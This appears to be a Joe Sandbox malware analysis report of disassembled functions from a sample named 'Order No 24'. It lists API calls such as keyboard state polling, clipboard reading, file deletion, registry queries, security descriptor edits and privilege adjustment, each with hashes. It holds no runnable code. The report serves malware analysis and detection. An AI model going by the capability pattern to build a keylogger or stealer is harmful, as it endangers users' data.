                                                                                                                                  • Instruction Fuzzy Hash: C3816B72800209AFEF11DFE4DE49AEEBBBCEF04324F044119F914A61A1D7728E56DB61
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009C5FA6,?), ref: 009C6ED8
  • Part of subcall function 009C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009C5FA6,?), ref: 009C6EF1
  • Part of subcall function 009C725E: __wsplitpath.LIBCMT ref: 009C727B
  • Part of subcall function 009C725E: __wsplitpath.LIBCMT ref: 009C728E
  • Part of subcall function 009C72CB: GetFileAttributesW.KERNEL32(?,009C6019), ref: 009C72CC
• _wcscat.LIBCMT ref: 009C6149
• _wcscat.LIBCMT ref: 009C6167
• __wsplitpath.LIBCMT ref: 009C618E
• FindFirstFileW.KERNEL32(?,?), ref: 009C61A4
• _wcscpy.LIBCMT ref: 009C6209
• _wcscat.LIBCMT ref: 009C621C
• _wcscat.LIBCMT ref: 009C622F
• lstrcmpiW.KERNEL32(?,?), ref: 009C625D
• DeleteFileW.KERNEL32(?), ref: 009C626E
• MoveFileW.KERNEL32(?,?), ref: 009C6289
• MoveFileW.KERNEL32(?,?), ref: 009C6298
• CopyFileW.KERNEL32(?,?,00000000), ref: 009C62AD
• DeleteFileW.KERNEL32(?), ref: 009C62BE
• FindNextFileW.KERNEL32(00000000,00000010), ref: 009C62E1
• FindClose.KERNEL32(00000000), ref: 009C62FD
• FindClose.KERNEL32(00000000), ref: 009C630B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
• String ID: \*.*$p1#v`K$v
• API String ID: 1917200108-1732502266
• Opcode ID: c96f2b732773e21ad69588e4d6db18c7ac641f575ed25e17df808a7ab8b45e46
• Instruction ID: 7d986afe1317f986c8643e9ac30f6d15dfa37a319432f3f76cef9b19f2b9fc84
• Opcode Fuzzy Hash: c96f2b732773e21ad69588e4d6db18c7ac641f575ed25e17df808a7ab8b45e46
• Instruction Fuzzy Hash: 9C511F72C0811C6ACB21EB95CC44EEFB7BCAF45300F0905EAE595E2141EE36974ACFA5
APIs
• OpenClipboard.USER32(00A1DC00), ref: 009D6B36
• IsClipboardFormatAvailable.USER32(0000000D), ref: 009D6B44
• GetClipboardData.USER32(0000000D), ref: 009D6B4C
• CloseClipboard.USER32 ref: 009D6B58
• GlobalLock.KERNEL32(00000000), ref: 009D6B74
• CloseClipboard.USER32 ref: 009D6B7E
• GlobalUnlock.KERNEL32(00000000), ref: 009D6B93
• IsClipboardFormatAvailable.USER32(00000001), ref: 009D6BA0
• GetClipboardData.USER32(00000001), ref: 009D6BA8
• GlobalLock.KERNEL32(00000000), ref: 009D6BB5
• GlobalUnlock.KERNEL32(00000000), ref: 009D6BE9
• CloseClipboard.USER32 ref: 009D6CF6
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
• String ID:
• API String ID: 3222323430-0
• Opcode ID: 15402e3f31fd536b94edeea822d25c07dd4e4db16edf052773184b7e2a6661d2
• Instruction ID: 9bafe0fbb01de3ae504db69cdc33f613ec77182b10f9e533f841aeff1d2f2d7b
• Opcode Fuzzy Hash: 15402e3f31fd536b94edeea822d25c07dd4e4db16edf052773184b7e2a6661d2
• Instruction Fuzzy Hash: 5B519072244205ABD300FFA4DD96F6E77A8AF88B10F00442AF686D62D1DF75D9068B62
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 009CF62B
• FindClose.KERNEL32(00000000), ref: 009CF67F
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009CF6A4
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009CF6BB
• FileTimeToSystemTime.KERNEL32(?,?), ref: 009CF6E2
• __swprintf.LIBCMT ref: 009CF72E
• __swprintf.LIBCMT ref: 009CF767
• __swprintf.LIBCMT ref: 009CF7BB
  • Part of subcall function 009A172B: __woutput_l.LIBCMT ref: 009A1784
• __swprintf.LIBCMT ref: 009CF809
• __swprintf.LIBCMT ref: 009CF858
• __swprintf.LIBCMT ref: 009CF8A7
• __swprintf.LIBCMT ref: 009CF8F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
• String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
• API String ID: 835046349-2428617273
• Opcode ID: 7169e5460165ca8b838dd1c0318d92b37f8b37e6cd93a742876cd5a76961a13e
• Instruction ID: 3030244f3bcf8eec397ceb097d2e680005fdf8fb9c3a282b9b6f07b97c2e76a3
• Opcode Fuzzy Hash: 7169e5460165ca8b838dd1c0318d92b37f8b37e6cd93a742876cd5a76961a13e
• Instruction Fuzzy Hash: E8A100B2408344ABC710EFA4C995EAFB7ECAF98704F440D2EF595C2152EB34D949C762
APIs
• FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 009D1B50
• _wcscmp.LIBCMT ref: 009D1B65
• _wcscmp.LIBCMT ref: 009D1B7C
• GetFileAttributesW.KERNEL32(?), ref: 009D1B8E
• SetFileAttributesW.KERNEL32(?,?), ref: 009D1BA8
• FindNextFileW.KERNEL32(00000000,?), ref: 009D1BC0
• FindClose.KERNEL32(00000000), ref: 009D1BCB
• FindFirstFileW.KERNEL32(*.*,?), ref: 009D1BE7
• _wcscmp.LIBCMT ref: 009D1C0E
• _wcscmp.LIBCMT ref: 009D1C25
• SetCurrentDirectoryW.KERNEL32(?), ref: 009D1C37
• SetCurrentDirectoryW.KERNEL32(00A339FC), ref: 009D1C55
• FindNextFileW.KERNEL32(00000000,00000010), ref: 009D1C5F
• FindClose.KERNEL32(00000000), ref: 009D1C6C
• FindClose.KERNEL32(00000000), ref: 009D1C7C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1803514871-438819550
• Opcode ID: 14d757e0e3ba0503e57c02d8329e65e0f69d14f36a409ce4b863dcb67672d115
• Instruction ID: bda6d1c2248e13cb5046cf46814428c8a24eb548b3b6eed2e1860256d907e9b7
• Opcode Fuzzy Hash: 14d757e0e3ba0503e57c02d8329e65e0f69d14f36a409ce4b863dcb67672d115
• Instruction Fuzzy Hash: 49318033A84219BBDF10EBF0DC49BDE77ACAF45324F148557F811E2190EB74DA868A64
APIs
• FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 009D1CAB
• _wcscmp.LIBCMT ref: 009D1CC0
• _wcscmp.LIBCMT ref: 009D1CD7
  • Part of subcall function 009C6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009C6BEF
• FindNextFileW.KERNEL32(00000000,?), ref: 009D1D06
• FindClose.KERNEL32(00000000), ref: 009D1D11
• FindFirstFileW.KERNEL32(*.*,?), ref: 009D1D2D
• _wcscmp.LIBCMT ref: 009D1D54
• _wcscmp.LIBCMT ref: 009D1D6B
• SetCurrentDirectoryW.KERNEL32(?), ref: 009D1D7D
• SetCurrentDirectoryW.KERNEL32(00A339FC), ref: 009D1D9B
• FindNextFileW.KERNEL32(00000000,00000010), ref: 009D1DA5
• FindClose.KERNEL32(00000000), ref: 009D1DB2
• FindClose.KERNEL32(00000000), ref: 009D1DC2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 1824444939-438819550
• Opcode ID: 00fd5f8c62dcefffd0eb417405621f45c2b51558037283f16bab8a7ac4d39a5c
• Instruction ID: 417264114bd67a972619bdbaca68f8a38bf22b8a2192b2e52aa92de2bba22194
• Opcode Fuzzy Hash: 00fd5f8c62dcefffd0eb417405621f45c2b51558037283f16bab8a7ac4d39a5c
• Instruction Fuzzy Hash: 6C31D43394461EBADF10EFE0DC09BDE77ADAF45324F148556F801A22D1DB70DA868A64
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: _memset
• String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
• API String ID: 2102423945-2023335898
• Opcode ID: 10abb51b9aab4e40dbfec29519e0efaa48b6a9e387d6868290497e8321d15e37
• Instruction ID: bb63e855cd2ad8d9c4421aa2ab1bd64925edb32b31c65079aa8362dd690e040a
• Opcode Fuzzy Hash: 10abb51b9aab4e40dbfec29519e0efaa48b6a9e387d6868290497e8321d15e37
• Instruction Fuzzy Hash: F982CF71D04219CBCF24DF98C8907BEBBB5BF48310F2485A9D959AB391E7749E81CB90
APIs
• GetLocalTime.KERNEL32(?), ref: 009D09DF
• SystemTimeToFileTime.KERNEL32(?,?), ref: 009D09EF
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009D09FB
                                                                                                                                  • __wsplitpath.LIBCMT ref: 009D0A59
                                                                                                                                  • _wcscat.LIBCMT ref: 009D0A71
                                                                                                                                  • _wcscat.LIBCMT ref: 009D0A83
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009D0A98
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 009D0AAC
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 009D0ADE
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 009D0AFF
                                                                                                                                  • _wcscpy.LIBCMT ref: 009D0B0B
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009D0B4A
                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
• String ID: *.*
• API String ID: 3566783562-438819550
• Opcode ID: bf64a5d591f53e350d9be88d05cd2762496770e6fa55e29fd7ad185dbb0991a4
• Instruction ID: 9f6f1332383dcad8fe6be7be9bf1c44d6853bda77e6cce547dc3498ff1df62dd
• Opcode Fuzzy Hash: bf64a5d591f53e350d9be88d05cd2762496770e6fa55e29fd7ad185dbb0991a4
• Instruction Fuzzy Hash: 4A6136725082059FDB10EF60C845AAEB3E8FFC9314F04891EF99997351EB35EA45CB92
APIs
  • Part of subcall function 009BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 009BABD7
  • Part of subcall function 009BABBB: GetLastError.KERNEL32(?,009BA69F,?,?,?), ref: 009BABE1
  • Part of subcall function 009BABBB: GetProcessHeap.KERNEL32(00000008,?,?,009BA69F,?,?,?), ref: 009BABF0
  • Part of subcall function 009BABBB: HeapAlloc.KERNEL32(00000000,?,009BA69F,?,?,?), ref: 009BABF7
  • Part of subcall function 009BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 009BAC0E
  • Part of subcall function 009BAC56: GetProcessHeap.KERNEL32(00000008,009BA6B5,00000000,00000000,?,009BA6B5,?), ref: 009BAC62
  • Part of subcall function 009BAC56: HeapAlloc.KERNEL32(00000000,?,009BA6B5,?), ref: 009BAC69
  • Part of subcall function 009BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,009BA6B5,?), ref: 009BAC7A
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009BA6D0
• _memset.LIBCMT ref: 009BA6E5
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009BA704
• GetLengthSid.ADVAPI32(?), ref: 009BA715
• GetAce.ADVAPI32(?,00000000,?), ref: 009BA752
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009BA76E
• GetLengthSid.ADVAPI32(?), ref: 009BA78B
• GetProcessHeap.KERNEL32(00000008,-00000008), ref: 009BA79A
• HeapAlloc.KERNEL32(00000000), ref: 009BA7A1
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 009BA7C2
• CopySid.ADVAPI32(00000000), ref: 009BA7C9
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009BA7FA
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009BA820
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 009BA834
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
• String ID:
• API String ID: 3996160137-0
• Opcode ID: e8048f1d0fc0aac7caf6c465164dae86dbe6b17d93da25f190e85cf96f04c43b
• Instruction ID: 1904bd344abf948cd9e6d2c0f288186cd1a90dd57b65ffd0df9b574e9b12d0cb
• Opcode Fuzzy Hash: e8048f1d0fc0aac7caf6c465164dae86dbe6b17d93da25f190e85cf96f04c43b
• Instruction Fuzzy Hash: 2F514A71900209ABDF14DFE5DD85AEEBBB9FF44310F048129F915A72A0DB359A06CB61
APIs
  • Part of subcall function 009C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009C5FA6,?), ref: 009C6ED8
  • Part of subcall function 009C72CB: GetFileAttributesW.KERNEL32(?,009C6019), ref: 009C72CC
• _wcscat.LIBCMT ref: 009C6441
• __wsplitpath.LIBCMT ref: 009C645F
• FindFirstFileW.KERNEL32(?,?), ref: 009C6474
• _wcscpy.LIBCMT ref: 009C64A3
• _wcscat.LIBCMT ref: 009C64B8
• _wcscat.LIBCMT ref: 009C64CA
• DeleteFileW.KERNEL32(?), ref: 009C64DA
• FindNextFileW.KERNEL32(00000000,00000010), ref: 009C64EB
• FindClose.KERNEL32(00000000), ref: 009C6506
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
• String ID: \*.*$p1#v`K$v
• API String ID: 2643075503-1732502266
• Opcode ID: fc6604c3e9d321dbfd6f33bdf8acffc3a0180945136ba1bad700f36a57311fa2
• Instruction ID: 7457d804b62220d72783b97de051c15627e43f1bd8c10b9e500d63f25a4cff95
• Opcode Fuzzy Hash: fc6604c3e9d321dbfd6f33bdf8acffc3a0180945136ba1bad700f36a57311fa2
• Instruction Fuzzy Hash: 413121B2808388AAC721DBE48885EDBB7ECAB96310F44491EF5D9C3141EB35D54987A7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID:
• String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
• API String ID: 0-4052911093
• Opcode ID: f9ba260c52c1938be0250730c04c9d60e20a21f4638e6e219bb6b388fc98d3e8
• Instruction ID: 271aedc37b367ab4d2a7f9193d9e5c8566e0f5090ce6e284fa19bee1e72e52e7
• Opcode Fuzzy Hash: f9ba260c52c1938be0250730c04c9d60e20a21f4638e6e219bb6b388fc98d3e8
• Instruction Fuzzy Hash: 5D727F71E04219DBDF24DF98D8807AEB7B5BF48310F24816AE915EB390DB749E81DB90
APIs
  • Part of subcall function 009E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009E2BB5,?,?), ref: 009E3C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009E328E
  • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
  • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 009E332D
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 009E33C5
• RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 009E3604
• RegCloseKey.ADVAPI32(00000000), ref: 009E3611
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1240663315-0
                                                                                                                                  • Opcode ID: 835b1b70f618860a9946f4df965c1109f9c9a85805a03de79510a97325b5f262
                                                                                                                                  • Instruction ID: 5c1c4b0427857c5ea6c36ab3ac934a1b5d7c3e396a8e68c61c3ed8dfaa41598a
                                                                                                                                  • Opcode Fuzzy Hash: 835b1b70f618860a9946f4df965c1109f9c9a85805a03de79510a97325b5f262
                                                                                                                                  • Instruction Fuzzy Hash: A2E13A71604200AFCB15DF69C995E2ABBE8EF88714B04C96DF44ADB3A1DB30ED05CB52
                                                                                                                                  APIs
                                                                                                                                  • GetKeyboardState.USER32(?), ref: 009C2B5F
                                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 009C2BE0
                                                                                                                                  • GetKeyState.USER32(000000A0), ref: 009C2BFB
                                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 009C2C15
                                                                                                                                  • GetKeyState.USER32(000000A1), ref: 009C2C2A
                                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 009C2C42
                                                                                                                                  • GetKeyState.USER32(00000011), ref: 009C2C54
                                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 009C2C6C
                                                                                                                                  • GetKeyState.USER32(00000012), ref: 009C2C7E
                                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 009C2C96
                                                                                                                                  • GetKeyState.USER32(0000005B), ref: 009C2CA8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 541375521-0
                                                                                                                                  • Opcode ID: 6b40cfb5cfc03c5aace16e8d474b22b1d0ce891354062f07849239b34a64ecfb
                                                                                                                                  • Instruction ID: cb89be99190bcde77a74580a86ff6bbd66c60aab35a1646ba3896017a9bccba8
                                                                                                                                  • Opcode Fuzzy Hash: 6b40cfb5cfc03c5aace16e8d474b22b1d0ce891354062f07849239b34a64ecfb
                                                                                                                                  • Instruction Fuzzy Hash: 7F41C734D447C96DFF359BA48814BB9BEA86F22344F04809DD9C6562C2DBA49DC8C7A3
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1737998785-0
                                                                                                                                  • Opcode ID: 3abfa4217d812e7e35058d68011b5ee7b4c91f520d2004db1cd36ac9450e8513
                                                                                                                                  • Instruction ID: 65deb1d6a3221a6a3e0d3ced408760198d60ce233975d891181f6321385ed1ac
                                                                                                                                  • Opcode Fuzzy Hash: 3abfa4217d812e7e35058d68011b5ee7b4c91f520d2004db1cd36ac9450e8513
                                                                                                                                  • Instruction Fuzzy Hash: 1F21A336340214AFDB11EF98EC49F6D77A9EF84710F04841AF94ADB2A1DB35EC028B51
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009B9ABF: CLSIDFromProgID.OLE32 ref: 009B9ADC
                                                                                                                                    • Part of subcall function 009B9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 009B9AF7
                                                                                                                                    • Part of subcall function 009B9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 009B9B05
                                                                                                                                    • Part of subcall function 009B9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 009B9B15
                                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 009DC235
                                                                                                                                  • _memset.LIBCMT ref: 009DC242
                                                                                                                                  • _memset.LIBCMT ref: 009DC360
                                                                                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 009DC38C
                                                                                                                                  • CoTaskMemFree.OLE32(?), ref: 009DC397
                                                                                                                                  Strings
                                                                                                                                  • NULL Pointer assignment, xrefs: 009DC3E5
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                  • String ID: NULL Pointer assignment
                                                                                                                                  • API String ID: 1300414916-2785691316
                                                                                                                                  • Opcode ID: de721af04d4148b496740198d0c26322ac1cb4de14ffdc2e87a0a645c3be8779
                                                                                                                                  • Instruction ID: a256952599308d79ee1b72802870b987562f9fb52245d650be862a561662669d
                                                                                                                                  • Opcode Fuzzy Hash: de721af04d4148b496740198d0c26322ac1cb4de14ffdc2e87a0a645c3be8779
                                                                                                                                  • Instruction Fuzzy Hash: 33914DB1D00219ABDB10DFA4DC91FEEBBB9EF44710F10815AF515A7291DB70AA45CFA0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009BB180
                                                                                                                                    • Part of subcall function 009BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009BB1AD
                                                                                                                                    • Part of subcall function 009BB134: GetLastError.KERNEL32 ref: 009BB1BA
                                                                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 009C7A0F
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
